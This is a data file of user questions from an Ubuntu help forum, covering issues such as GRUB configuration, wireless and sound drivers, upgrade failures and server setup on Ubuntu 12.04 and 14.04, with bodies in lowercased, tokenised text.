456913	disabling the grub recovery mode programatically	i need to be able to update the grub config to remove the recovery mode boot option , programmatically . i got the initial info for how to do this ( manually ) from this question/answer : how to disable recovery mode/single user mode ? so i wrote a simple script , which is packaged up with a replacement grub file . the script simple does : # move the new grub file contents into place cat /path/to/replacement/grub > /etc/default/grub # update grub with the new settings update-grub in this script the `` /path/to/replacement/grub '' has these contents : http : //paste.ubuntu.com/7328274/ , and replaces the standard file http : //paste.ubuntu.com/7328269/ that 's in the system . the system is ubuntu 12.04 , and the script above is run as sudo . the problem is that most of the time it works , but some of the time it completely nerfs grub , and when the system is rebooted , it lands at the grub command line , rather than booting normally . from the grub command line , i can load the kernel , boot linux , and then when at the bash command line , i can run : sudo update-grub then reboot , and everything is then fine . but can anyone tell me why sometimes it does n't just work as part of the script ? notes : the goal is simply to remove the recovery mode boot option from the grub menu , with no user intervention other than running the script - the reasons for this are complex , but that 's the way it is : ) the only difference between the 2 grub files should be the uncommenting of the line 'grub_disable_recovery= '' true '' ' i cat the contents into the correct file ( instead of cp'ing or mv'ing ) because i figured it was the easiest way to ensure that file perms were n't messed up . the process usually works , and rebooting the system removes the recovery mode grub menu option ( as desired ) . but just sometimes ... does n't work
456915	system restarting after user login	in ubuntu 12.10 system getting restarted if we login in gui but we can able to login via terminal mode.please tell me solution for this . i have update and upgraded system via terminal but till not resolved .
456917	after installing cinnamon , ca n't change access ubuntu wallpapers	after installing cinnamon by removing ubuntu 14.04 unity with steps from this link i am unable to see and change trusty wallpapers from control center in cinnamon . need help ...
456918	cups-insecure-filter error for lexmark printer on trusty	i am trying to install my lexmark s800 series printer ( 32-bit ) on ubuntu 14.04 trusty , and i continue to get a 'cups-insecure-filter ' error message . the printer is connected to lpt1 , and the printer wizard correctly adds the printer/ppd . it 's when i first go to print a test page that i get the error . i followed the instructions on this page to ensure that the permissions were correct for /usr/local/lexmark/v3/bin/printfilter . has anyone else had this issue trying to get a lexmark printer running on trusty ? no amount of googling has helped on this one . thank you ! !
456923	umts/hsdpa data sim card on ubuntu 14.04	hardware is a compaq mini notebook with hp hs2300 broadband wireless module . umts provider and sim card is vodafone . wireless wwan is working well under windows xp , but um my second system , ubuntu 14.04 only wlan has functionality . does anybody know a software connecting the existing hardware to ubuntu 14.04 ?
456924	ubuntu 14.04 is frequently hanging	ubuntu 14.04 is installed in my asus k-55vd . it hangs frequently and after pressing ctrl+alt+f1 or f2 etc . and then after again pressing ctrl+alt+f7 it gets fix automatically , sometimes with a partial black ( no graphics there ) screen for few seconds . what to do ?
456925	how to remove window decorations from ubuntu 14.04	i never used window decorations to maximize / minimize windows , but keyboard and mouse/keyboard shortcuts for all operations . in the good olde days , you could just disable and tweak the window decorations plugin from compiz settings manager . in 14.04 , this is not possible . how can one get rid of the top window bar with the close / minimize / maximize buttons ?
456927	need to setup squid proxy by using ip tables	know i was configured squid proxy server in ubuntu 12.04 with out ip tables but i need to configure with ip table.can you please help me for this any one , for how to configure squid proxy by using ip tables
456933	extract particular value from the variable	i want just know how to extract the value from the variable in shell script . following is the code : var=volume : 0 : 100 % 1 : 100 % or var=volume : 0 : 35 % 1 : 35 % i want to extract 100 or 35 depends value from the variable and store it into another variable . so how can i do this ?
456935	keystroke error in unity after upgrade to 14.04	after upgrading to ubuntu 14.04 a strange error occurred : keystroke on c has no effect , whereas a longer stroke gives a lot of c 's ( as expected ) . the error is reproducible , but appears in unity only , not in gnome 3.10 which is installed as well . key c still works well at the login prompt . changing the keyboard layout ( from german to english ) has no effect . so it should n't be a hardware error , nor an error of the keyboard layout . but what else could it be ? as far as i mentioned , there are no other keys affected . does anyone have a clue ?
456944	upgrade from ubuntu 11.10 to 14.04	i 'm still running ubuntu 11.10 . can i upgrade to 14.04 directly from 11.10 , or is there a certain upgrade-path one needs to follow ? also , is 14.04 stable enough , or is it better to stick to an earlier version for now ?
456945	ubuntu server startup error	my server gives a strange error on startup ( runs ubuntu-server ) . after the bootscreen it does nothing anymore except for this screens ( they change when i press space ) : also tried to insert a windows dvd ( just to try ) , but than i also get a error . so i think it is an hardware problem , but i have no idea what it can be . maybe it is in the messages on the screens ? thanks in advance .
456949	ubuntu 14.04 is so slow	i have browsed various topics that has been created about just this issue and i tried them but no luck ... i just installed ubuntu 14.04 in my windows 8.1 os and for the first time i logged in ubuntu it was just very slow and i could hardly do anything . i have installed and updated files , gpu afterwards but no luck . meanwhile my system is not slow at all.. windows 8.1 32 gb ram intel core i7 4770k evga geforce gtx 680 2gb gpu can anyone help me for this please ?
456950	system tray icons disappeared after installing ubuntu 14.04	i have many applications with tray icons like davmail , hardware monitor . i miss this feature on ubuntu 14.04 . does anyone have a solution ? there are some tools like skype indicator , but i need a general solution for this problem so that i can add application icons to the system tray .
456951	is it possible to access disks in an lvm after a reinstallation of the os on a separate drive ?	i have a 120gb ssd hosting my ubuntu installation . i have four 3tb western digital disks which i would like to configure into an lvm . if i reinstall ubuntu at any point in the future onto the ssd or indeed change the ssd for another , is it possible for me to access the lvm partitions etc . afterwards ?
456954	formatted my hp win 8 laptop , ubuntu will not auto load without the cd in the drive at all	i installed ubuntu on my hp-pavillion that came with windows 8 . i formatted the drive and installed ubuntu but when i turn the machine on and load from the hdd , i just get a dos screen and _ cursor . to get into the os i need the cd in the drive , it then takes me to my desktop . if i try another installation , it sees i already have ubuntu installed on the drive . do you know how i can get a boot loader to detect and auto load ubuntu ? thank you for any help .
456959	running php scriipt as daemon . system_daemon or init ?	i am relatively new to linux , and was trying to find a way to run a php script as a daemon . i have now found 2 ways to do this ( using an init script , or php/pear system_dameon class ) . i was wondering what the differences are between them , and whether it is just down to opinion as to which one is better . and also , do both methods produce exactly the same outcome when the daemon has started ( such as functionality , system resources etc ) . thanks : d
456960	user name recover from cosole	i have `` the system is running in low-graphics mode '' problem and i tried the recovery mode ( recovery mode/failsafex ) and it did n't work . it happened after and update i searched for a solution and found the manual so i went with the ( ctrl+alt+f1 ) for manual fixing the problem is i do n't remember the user `` or if it is case sensitive '' my question is : is there a code typed in the console to recover or show users list of sort to confirm my username or if it is case sensitive ?
456963	slow grub selection-screen in ubuntu 14.04	since upgrading from ubuntu 12.04 to ubuntu 14.04 in dualboot with win8.1 ( complete new install ) , grub seems to need a higher amount of time to load . it shows the selection screen as fast as in 12.04 but is n't responsive for 2-3 seconds and is then executing all user input at once . has someone noticed the same behavior or can help me to get this fixed ? thank you !
456964	wireless connection wt 2000 pci	in windows 7 i connected to an wireless network tp-link with no problem using dhcp and wifi card wt 2000 pci , but after i installed ubuntu 14.04 and when i connect to the same network it connects but no internet also using dhcp , i tried also manualy adding the ip address but still the same it connects with no internet , so where is the problem there ? thank you all for answers . jasmin @ jasmin-desktop : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:785 errors:0 dropped:0 overruns:0 frame:0 tx packets:785 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:64412 ( 64.4 kb ) tx bytes:64412 ( 64.4 kb ) wlan0 link encap : ethernet hwaddr 00:4f:6a:05 : ca : df inet addr:192.168.1.6 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :24f:6aff : fe05 : cadf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:320 errors:0 dropped:0 overruns:0 frame:0 tx packets:839 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:138298 ( 138.2 kb ) tx bytes:109630 ( 109.6 kb ) jasmin @ jasmin-desktop : ~ $ ping google.com ping : unknown host google.com kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 jasmin @ jasmin-desktop : ~ $
456965	problems using custom keyboard layout / symbols file	i have a custom xkb symbols file which looks as follows : // modify the basic german layout to have polish characters default partial alphanumeric_keys xkb_symbols `` basic '' { include `` de ( basic ) '' name [ group1 ] = '' germany - with polish characters '' ; key < ad03 > { [ e , e , eogonek , eogonek ] } ; key < ad09 > { [ o , o , oacute , oacute ] } ; key < ac01 > { [ a , a , aogonek , aogonek ] } ; key < ac02 > { [ s , s , sacute , sacute ] } ; key < ad06 > { [ z , z , zabovedot , zabovedot ] } ; key < ab02 > { [ x , x , zacute , zacute ] } ; key < ab03 > { [ c , c , cacute , cacute ] } ; key < ab06 > { [ n , n , nacute , nacute ] } ; } ; the name of the file is depl . i copy the file to /usr/share/x11/xkb/symbols and it works with setxkbmap depl . however , i also tried to add the respective menu entries in the `` text entry '' customization . i have modified the file /usr/share/x11/xkb/rules/evdev.xml and added the following section : < layout > < configitem > < name > depl < /name > < shortdescription > depl < /shortdescription > < description > german ( with polish characters ) < /description > < languagelist > < iso639id > ger < /iso639id > < /languagelist > < /configitem > < /layout > i have then reconfigured the xkb data with sudo dpkg-reconfigure xkb-data . it works in as much as that the new layout appears as a viable option in the text entry dialog , it can be added to the list of dialogs and is visible in the application indicator : however , it does not work , the new symbols are not loaded . no errors are reported in /var/log/xorg.0.log .
456969	ubuntu 14.04 lts and keyoard shortcuts	i 've recently installed ubuntu 14.04 lts on sony vaio ns 21z/s laptop . i wanted to change the default mute combination from fn+ '' mute key '' to a special button . in preferences i 've changed it . it detected the new button , but it does n't work . after that i returned to the original combination and it does n't work either . how can i fix it ? best regards , mateusz
456970	constantly asked for wifi password and ca certificate	i have a wpa enterprise peap connection that asks me for the wifi password and ca certificate every time i am at the login screen . i do n't have a ca certificate for my schools wifi connection . this is on ubuntu 14.04 this warning keeps coming again and again . i keep click ignore and click `` do n't warn me again '' but the error keeps coming up . also , i have tried changing going to etc/networkmanager/system-connections finding the my connection and changing the line system-ca-certs=true to system-ca-certs=false but that did not help at all .
456979	the .xkm file loading error	after i install the graphic cards driver , when i log in the system the error below happen . graphic cards : ati mobility hd 5650 + intel when boot the screen can display the login screen , after i type in the password and press enter this error happen , at this time i can only see the wallpaper and the mouse pointer [ 290.376 ] ( ii ) intel ( 0 ) : switch to mode 1366x768 @ 60.1 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 290.395 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 290.500 ] ( ii ) xkb : generating xkmfile /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm [ 290.518 ] ( ee ) error loading keymap /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm
456980	how do i set a different default place when i click on 'files ' in the sidebar ?	this is another question all about the usability of unity , which is proving to be not as easy to customise as i 'd like . using ubuntu 14.04 , when i click on the files icon , it immediately takes me to $ home . however , i would like to set it it to , for example , $ home/desktop/folder . this would make my navigation much better .
456985	how to change the keyboard shortcut to take screenshots with shutter ?	i use shutter for screenshots . when i press print screen or shift + ctrl + z , a popup appears that a screenshot is going to be made in 2 seconds . after that shutter opens , and i can then crop the image directly to the relevant part , which is for me the real bonus of this program . however , i do n't like the shift + ctrl + z keybinding as this is used in other programs for redo , so i want to disable or change that to another combination . how can i make this happen ?
456986	i can not login shell as superuser	i am the owner and every time i try to login shell as superuser using 'su ' command i receive [ su : authentication failure. ] ! ! ? what is wrong ? ? ? thanks
456987	installing printer	i tried installing the epson printer driver from here . it managed to install and when i try to print it goes into the print queue . however when it goes away , the printer does not even print . this is not the case for the same printer when plugged into a windows machine
456988	404 error when permalink enabled in wordpress - ubuntu 13.10	i have my vps server with installed ubuntu 13.10 i 've installed wordpress on it via ftp and configured it . then created few pages and enabled permalink . unfortunately , instead of pages it shows me 404 error . so i changed in apache configuration options : indexes followsymlinks multiviews allowoverride none to all . and also i added .htaccess file to the wordpress directory which looks like this : # begin wordpress < ifmodule mod_rewrite.c > rewriteengine on rewritebase / rewriterule ^index\.php $ - [ l ] rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule . /index.php [ l ] < /ifmodule > # end wordpress and nothing changed . still 404 error . any ideas ? thx a lot !
456990	do older repositories no longer work with newer ubuntu version ?	i was hoping to be able to install the awesome mint menu in my gnome flashback session on ubuntu 14.04 . looking around the web , it seemed this was possible , and my searching has led me to this repository , which claims to have ported the mint menu to gnome . at least , as far as i understand it . however , it seems the repository stopped being maintained around ubuntu version 11 , three years ago . i tried adding the repository and installing mint menu anyway , hoping that just because it was old did n't mean it was necessarily unusable . however , it did n't install , giving me unresolvable package dependency issues , which i 've learned to not try and solve myself . is there no backwards compatibility between repositories ? if someone stops maintaining a repository , is it basically dead and useless ?
456991	how to enable alternative log in sessions ( e.g . unity 2d or others ) in trusty ?	i have just upgraded from ubuntu 12.04.4 lts to 14.04 lts on an i386 system ( dell optiplex 740 , with an integrated nvidia quadro nvs 210s chipset ) . the upgrade proceeded smoothly without any problem . in 12.04 i had the possibility of enabling the 2d unity shell ( or gnome-classic shells , and other alternatives ) from the main log in screen . however , after upgrading to 14.04 i see no way to specify my default log in session ( there is no icon available to open a menu in the log in screen ) . how can i enable alternative sessions in 14.04 ?
456994	problems with microphone on tactic 3d alpha	i have a tactic 3d alpha running via the included usb adapter but the microphone is not working . the laptop i 'm running it on is a acer aspire s3 with a broken mic/headphone port . output however is fine . the headset itself is not broken because it works fine on windows . i already looked anywhere and ca n't find anyone having the same issues . operating system is ubuntu 14.04 .
456995	computer turned off during ubuntu 14.04 update	my computer just turned off during an update from 12.04 to 14.04 it was in the middle of installing all the new software and packages . when i tried to turn it back on it would not boot up at all . gave a black screen with a bunch of `` command '' lines ( not sure what to call them ) . have i lost everything on my hard drive ? is there a work around so that i can at least get back to the old version and try again ? any help/links to help would be greatly appreciated thanks !
456999	ubuntu and windows on one hdd drive	lately was the release of ubuntu 14.04 . i was using 12.04 on my laptop but it was installed with wubi installer . i tried to search for a wubi with 14.04 but did n't find it . can is there a way to install 14.04 alongside windows 7 on one hdd . i had and idea to to upgrade 12.04 to 14.04 but i do n't know will this work . any ideas ?
457001	trackpad stopped working on my laptop after upgrading to 14.04	i upgraded my laptop to 14.04 . first of all , when rebooting i was greeted with a kernel panic related to vfs not syncing . i just booted into an older kernel and that worked fine . but from there , my touchpad would not respond . i tried booting a couple of times and it still wouldnt work . i am currently booted into my win7 boot ( dual boot ) and everything works just fine . i do n't understand why it wo n't work on ubuntu anymore . edit : i 've gotten a bit of info from dmesg . thinkpad_ec : module verification failed signature and/or required key missing - tainting kernel thinkpad_ec : no thinkpad embedded controller ! acpi_call : can not get handle error : ae_not_found
457003	setting up a send-only mail server	i 'm trying to setup an easy mail server to support my `` lost password '' function in my website . i 'd like to know if exim is good or not , or is there any better solution ? i would also like to know that it is n't easy to manage an smtp server ( such as blocking junk mail , or being hacked , etc ) , does setting up a send-only mail server cause any security issues ? thanks !
457005	grub not showing after upgrading to 14.04 dual boot win8	i have ubuntu installed alongside with windows 8 both x64 on hp envy laptop with amd a10 . when i upgraded to 14.04 grub menu did not show up and windows boots . i had the same problem before when i was first installing ubuntu and solved it simply by running boot-repair . however this time i tried it but it did n't make any difference . any suggestion will be helpful . thanks in advance..
457008	unable to connect via wifi in ubuntu 14.04 ?	so , as the title suggests , i am unable to connect to any wifi network . lan works just fine and the pc sees all of the networks near me ( though , the ones i 've connected to show almost 0 % signal strength ) . i 've been trying different things to no avail such as rebooting , disabling and re-enabling the wireless card ( realtek rtl8188ee ) , among other things that i 've found online . i 've run out of options and really do n't want to reinstall , so some help would be very appreciated .
457009	wifi wo n't work on 14.04	i have tried to install b43 using cutter and sta wifi drivers for ubuntu 14.04 on an hp compaq nx6310 , but it just wo n't work . wired ethernet only works with the live cd . any help on the exact procedure would be great . by doing the following below i get limited wired ethernet connection but no wifi ! if i do an update after this i get nothing again . cd /cdrom/pool/main/d/dkms sudo dpkg -i dkms* cd /cdrom/pool/main/f/fakeroot sudo dpkg -i fakeroot* cd /cdrom/pool/restricted/b/bcmwl sudo dpkg -i bcmwl-kernel-source*
457011	why is libtiff.so.4 not recognized ?	i recently updated from ubuntu 13.10 to 14.04 lts . i was using smoldyn , a particle-based simulation package , but since the update it does n't work anymore . after typing smoldyn i get the following error message : smoldyn : error while loading shared libraries : libtiff.so.4 : can not open shared object file : no such file or directory apparently , he can not find libtiff.so.4 . on the other hand , the command locate libtiff.so.4 gives me : /usr/lib/x86_64-linux-gnu/libtiff.so.4 /usr/lib/x86_64-linux-gnu/libtiff.so.4.3.6 so it seems that libtiff is correctly installed . do you have any idea what is wrong here ? why is smoldyn not running ? many thanks in advance ! my system : ubuntu 14.04 lts processor : intel® core™ i7-2600 cpu @ 3.40ghz × 8 graphics : gallium 0.4 on amd cedar os type : 64 bit
457015	broken qt4 package and system can not be upgraded	while trying to fix the 100 % /boot partition full , the `` qt4 '' package was inadvertently broken . now when i try to fix broken packages with `` synaptic package manager '' , i get the error below : is there any other way of fixing this short of reinstalling the os ? e : libqt4-xml : dependency problems - leaving unconfigured e : libqt4-dbus : dependency problems - leaving unconfigured e : qdbus : dependency problems - leaving unconfigured e : libqt4-network : dependency problems - leaving unconfigured e : libqt4-script : dependency problems - leaving unconfigured e : libqt4-xmlpatterns : dependency problems - leaving unconfigured e : libqt4-declarative : dependency problems - leaving unconfigured e : libqt4-designer : dependency problems - leaving unconfigured e : libqt4-help : dependency problems - leaving unconfigured e : libqt4-qt3support : dependency problems - leaving unconfigured e : libqt4-scripttools : dependency problems - leaving unconfigured e : libnepomukdatamanagement4 : dependency problems - leaving unconfigured e : plasma-scriptengine-javascript : dependency problems - leaving unconfigured e : kde-runtime : dependency problems - leaving unconfigured e : khelpcenter4 : dependency problems - leaving unconfigured e : qt4-linguist-tools : dependency problems - leaving unconfigured e : libqt4-dev : dependency problems - leaving unconfigured e : libqtgui4 : dependency problems - leaving unconfigured e : libqt4-opengl : dependency problems - leaving unconfigured e : libqt4-svg : dependency problems - leaving unconfigured
457016	how to change gsettings via remote shell ?	i need to automate desktop configuration via puppet , virtual terminal or ssh . unfortunately , invocation of gsettings via ssh or virtual terminal gives : gsettings set org.compiz.core : /org/compiz/profiles/unity/plugins/core/ hsize `` 4 '' ( process:29520 ) : dconf-warning ** : failed to commit changes to dconf : can not autolaunch d-bus without x11 $ display when i set the $ display with export display=:0.0 it gives another error : ( process:29862 ) : dconf-warning ** : failed to commit changes to dconf : could not connect : connection refused what can i do ?
457017	best graphics card ( setup ) for three , high-res monitors attached to desktop	i have been looking around a little bit , but most of the discussions are about problems with already existing systems ( particular graphics card and setup etc. ) . i would like to ask what would be the best option for me if i want to build powerful desktop with triple monitor setup . i have one dell ultrasharp u2713hm ( 27 inches , 2560x1440 ) and i was thinking about getting two more . would it be possible to have those three working with ubuntu ( kubuntu ) on any graphics card out there today ? what is the best option if it comes to choosing particular model ? should i use proprietary drivers or some open sourced ones ? i am not a gamer . i mostly develop on my machines and running some computational tasks , but i would rather like to spend some more money and have setup where i do n't see any lagging . darek
457018	access to ubuntu server 12.04 offline	how to login in ubuntu server when server is offline ? after start booting ubuntu screen show nothing ( refresh rate is out of range ) . i try ctrl + alt + f1 and other and i still have not access to my server . i ca n't login by ssh , because i broken /etc/network/interface and server is completely offline . any suggestion ? sorry for my english , it is n't my native language .
457019	problem with startup	i uploaded ubuntu 14.04 with no problem . when i start i get the message disk drive fo /tmp is not ready yet or not present . continue , press i to ignore , press s to skip mounting or m for manual recovery . neither of these options did any good . can it be that my internet card is not compatible with ubuntu ?
457027	unity disappeared in ubuntu 14.04	i was using my ubuntu 14.04 normally , and after i shutdown and restarted the computer , i saw that unity had disappeared . i tried the following commands , but none of them worked : sudo apt-get install unity sudo -- replace unity replace unity sudo apt-get replace unity sudo apt-get -- replace unity sudo apt-get install ubuntu-desktop sudo apt-get install ubuntu-desktop -- reinstall curiously i can not change desktop environments in spite of having installed several desktops ( gnome , cinnamon , etc. ) . there is not the launcher , dash , nothing about unity , the desktop wallpaper then appears blank without anything . i want to use lubuntu desktop environment . neither is the option of change of meeting . since i ca n't solve the problem by myself , i have decided to ask the community . thanks in advance .
457028	sound suddently stopped working for internal speakers , headphones still work	i have had no problems with the audio on my dell inspiron 15 1700 since i had purchased it a month ago . however , today the audio from my laptop 's internal speakers no longer works . it was working last night . i left my laptop open over night , and when coming back to the keyboard this morning the speakers no longer worked . my headphones still function perfectly , though . my system is also a dual boot win8/ubuntu . the audio works just fine in windows 8 still . can someone please assist me in enabling the audio on my internal speakers again ? i have tried the following : sudo apt-get remove -- purge alsa-base alsa-utils alsa-oss pulseaudio sudo apt-get install alsa-base alsa-utils alsa-oss pulseaudio sudo alsa force-reload pulseaudio -- kill pulseaudio -- start dump of /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use- blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 this is the output i get when running sudo alsa force-reload unloading alsa sound driver modules : snd-seq-midi snd-seq-midi-event snd-seq snd-rawmidi snd-seq-device snd-hda-codec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer ( failed : modules still loaded : snd-hda-codec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer ) . loading alsa sound driver modules : snd-seq-midi snd-seq-midi-event snd-seq snd-rawmidi snd-seq-device snd-hda-codec-hdmi snd-hda-codec-realtek snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer . output of uname -r : 3.13.0-24-generic output of sudo aplay -l : **** list of playback hardware devices **** home directory not accessible : permission denied card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc283 analog [ alc283 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 output of lspci -v | grep audio : 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) alsamixer screen : when trying to run the hda utility , i get the following error : traceback ( most recent call last ) : file `` /dev/shm/hda-analyzer/hda_analyzer.py '' , line 546 , in < module > sys.exit ( main ( sys.argv ) ) file `` /dev/shm/hda-analyzer/hda_analyzer.py '' , line 523 , in main if read_nodes ( sys.argv [ 1 : ] ) == 0 : file `` /dev/shm/hda-analyzer/hda_analyzer.py '' , line 89 , in read_nodes read_nodes2 ( c.card , i ) file `` /dev/shm/hda-analyzer/hda_analyzer.py '' , line 60 , in read_nodes2 c = hdacodec ( card , codec ) file `` /run/shm/hda-analyzer/hda_codec.py '' , line 1041 , in __init__ self.parse_proc ( ) file `` /run/shm/hda-analyzer/hda_codec.py '' , line 1140 , in parse_proc self.proc_codec = hdacodecproc ( self.card , self.device , file ) file `` /run/shm/hda-analyzer/hda_proc.py '' , line 479 , in __init__ self.parse ( proc_file ) file `` /run/shm/hda-analyzer/hda_proc.py '' , line 677 , in parse node.add_digital ( line [ 11 : ] ) file `` /run/shm/hda-analyzer/hda_proc.py '' , line 296 , in add_digital self.wrongfile ( 'unknown dig1 bit % s ' % repr ( b ) ) file `` /run/shm/hda-analyzer/hda_proc.py '' , line 143 , in wrongfile raise valueerror , `` wrong proc file format ( % s ) '' % msg valueerror : wrong proc file format ( unknown dig1 bit 'kae ' ) update 1 i have tried booting into an ubuntu 12.04 nad 14.04 live cd 's , and the audio does not work there either . this is really confusing as up until last night the audio functioned perfectly for my laptop . the audio still continues to work just fine in windows 8 .
457031	what are the differences between juju and chef ?	i read this post : what 's the difference between juju and puppet/chef ? but the last update older than a year and chef and juju still evolving ... now , what are the differences between chef and juju ? i try to provide to my customers a module ( or charm recipe ) so they can easily deploy my software suite . i read chef and juju are compatible with most systems . chef works with server and chef-clients , and juju plays in solo . but two do n't work at the same level of architecture ? what does this want to say ? thank you , felane
457035	track file and folder name changes	i 'm successfully running a remote backup of a small server over the internet using rsync . however , the process can be lengthy if the following happens . let 's say a large directory has had its name changed during the day , then all that data will be deleted from the backup and re-copied under the new directory name . now i imagine there 's not much i can do about this , it 's just how rsync works . nevertheless , i would like to know about it , so i can provide my users with some `` best practice '' advice and hopefully reduce the frequency of this kind of problem . so my question is this : using the `` find '' command , or something similar , is there any way of listing file and folder names that have been changed during the last 24 hours . i do n't need to know the original name ( though that would be nice ) , i only need to know that some name change has taken place .
457036	how to disable discrete graphic in ubuntu 14.04	i want know how to disable discrete graphic in ubuntu 14.04 , my computer 's gaphic cards are intel and ati 5650 . i only want to use the integrated card because the temperature of computer can stay low .
457040	can not remove nginx	i have been expirmenting with nginx as a webserver for php files . i come from an apache background but i wanted to try it . i recently had an issue with it and needed to switch back to apache . i removed it using apt-get remove nginx . this worked fine and i installed apache and life was good . i restarted my computer and somehow nginx started up . i did n't understand . i tried to remove it agian and i got the message : $ sudo apt-get remove nginx reading package lists ... done building dependency tree reading state information ... done package 'nginx ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . message if i look for the program : $ which nginx /usr/sbin/nginx which does anyone know if i am doing something wrong or what the next step to removing it would be ? i am using xubuntu 14.04 thank you ! mathew a
457041	boot after 14.04 installation fails because of missing /tmp	we have a an institution-wide installation of ubuntu ( previously 12.04 ) that is installed from network and uses a custom installer config for selecting the necessary packages and setting up ldap authentication . apart from that it is a normal ubuntu . we are now trying to setup this installation procedure for 14.04 . we can successfully install with our configuration from network , but the first boot fails with the message that /tmp is not available . the machine does not respond to any key presses at that moment ( so i can not skip or do manual recovery ) . the boot process is also extremely slow ( more than one minute until the message about /tmp is shown ) . i found a work around that helps . after installation , i need to boot into recovery mode once . in the recovery menu , i need to select network ( which mounts partitions and configures network ) and then resume . now the system boots fine , and any subsequent boot ( also without recovery mode ) is fine , too . so no manual fixing done , just a some how `` special '' boot once . if i skip the network step in the recovery menu and go straight to resume , it does not work . if i reboot immediately after the network step ( without going to resume ) , it also does not work . i did it manually once and entered a root shell from the recovery menu , everything looked fine at that time ( both before and after running the network steps ) . i diff'ed /etc and /var before and after running the network step , and there were no big differences ( just dhcp leases and logs in /var as expected ) . now my question is , what happens during this boot that is different from a normal boot ? i guess , at the first boot there are some installation duties remaining , and these somehow do not work on a normal boot , but what could they be ? maybe the manual execution of the network step from recovery menu changes the order of some things , and that resolves the problem ? can i fix these problems at the end of installation prior to first boot ( we run a script at that stage anyway ) so that everything just works ? how can i debug these problems and provide more information for you to help ? what file might change during boot and could be interesting ? i can reproduce both the problem and the workaround , so i can provide as much info as needed . our site-wide adjustments only affect ldap authentication and nfs home directories , not the boot process or the partitioning . during installation a root partition ( ext4 ) is created and a swap partition , no further partitions . this is a legacy boot ( no uefi ) . edit : i debugged it a little bit further . after installation i need to do the following steps once to : boot into recovery mode and start a root shell run mountall run ifup -a after that , everything works nicely . all three steps take much more time than expected ( around one minute each ) . after finishing , booting takes only a few seconds ( machine has an ssd ) .
